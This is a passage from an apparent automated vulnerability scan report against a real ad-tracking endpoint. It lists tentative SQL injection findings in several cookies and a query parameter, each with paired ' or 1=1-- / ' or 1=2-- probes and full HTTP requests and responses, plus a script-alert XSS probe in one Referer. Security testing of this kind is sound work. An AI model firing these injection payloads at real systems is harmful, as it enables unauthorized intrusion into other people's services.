GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false12779497'%20or%201%3d2--%20&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:16 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.19. http://tap.rubiconproject.com/oz/sensor [csi2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The csi2 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the csi2 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126'%20and%201%3d1--%20; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:57 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:11:57 GMT; Path=/
Set-Cookie: dq=46|4|42|0; Expires=Fri, 15-Jun-2012 15:11:57 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126'%20and%201%3d2--%20; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:57 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.20. http://tap.rubiconproject.com/oz/sensor [dq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The dq cookie appears to be vulnerable to SQL injection attacks. The payloads 15011000'%20or%201%3d1--%20 and 15011000'%20or%201%3d2--%20 were each submitted in the dq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|015011000'%20or%201%3d1--%20; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:12 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:09:12 GMT; Path=/
Set-Cookie: dq=13|4|9|15011000; Expires=Fri, 15-Jun-2012 12:09:12 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|015011000'%20or%201%3d2--%20; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:12 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.21. http://tap.rubiconproject.com/oz/sensor [k parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The k parameter appears to be vulnerable to SQL injection attacks. The payloads 16361420'%20or%201%3d1--%20 and 16361420'%20or%201%3d2--%20 were each submitted in the k parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,16361420'%20or%201%3d1--%20&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:27 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:27 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:27 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,16361420'%20or%201%3d2--%20&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:27 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.22. http://tap.rubiconproject.com/oz/sensor [khaos cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The khaos cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the khaos cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD'%20and%201%3d1--%20; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:55 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:56 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
